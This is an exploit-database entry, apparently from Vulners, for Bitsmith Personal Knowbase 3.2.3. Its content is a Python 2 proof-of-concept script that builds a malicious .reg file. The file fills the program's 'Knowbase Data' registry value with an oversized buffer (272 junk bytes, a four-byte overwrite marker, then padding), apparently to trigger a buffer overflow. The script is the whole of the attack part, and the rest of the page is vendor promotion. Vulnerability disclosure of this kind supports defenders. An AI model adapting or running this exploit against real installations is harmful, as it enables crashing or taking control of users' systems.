Lucene search
K

Bitsmith-PS-Knowbase-3.2.3

🗓️ 05 Jan 2015 16:14:21Reported by VulnerabilityLabType 
exploitpack
 exploitpack
👁 26 Views

Generating exploit file for Bitsmith-PS-Knowbase-3.2.3 with Windows Registry Edito

Code
file="poc.reg"
 
junk1="\x41" * 272
boom="\x42\x42\x42\x42"
junk2="\x43" * 100
 
poc="Windows Registry Editor Version 5.00\n\n"
poc=poc + "[HKEY_CURRENT_USER\Software\Bitsmith Software\Personal Knowbase\Directories]\n"
poc=poc + "\"Knowbase Data\"=\"" + junk1 + boom + junk2 + "\""
 
try:
    print "[*] Creating exploit file...\n";
    writeFile = open (file, "w")
    writeFile.write( poc )
    writeFile.close()
    print "[*] File successfully created!";
except:
    print "[!] Error while creating file!";

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 Jan 2015 16:14Current
1.1Low risk
Vulners AI Score1.1
26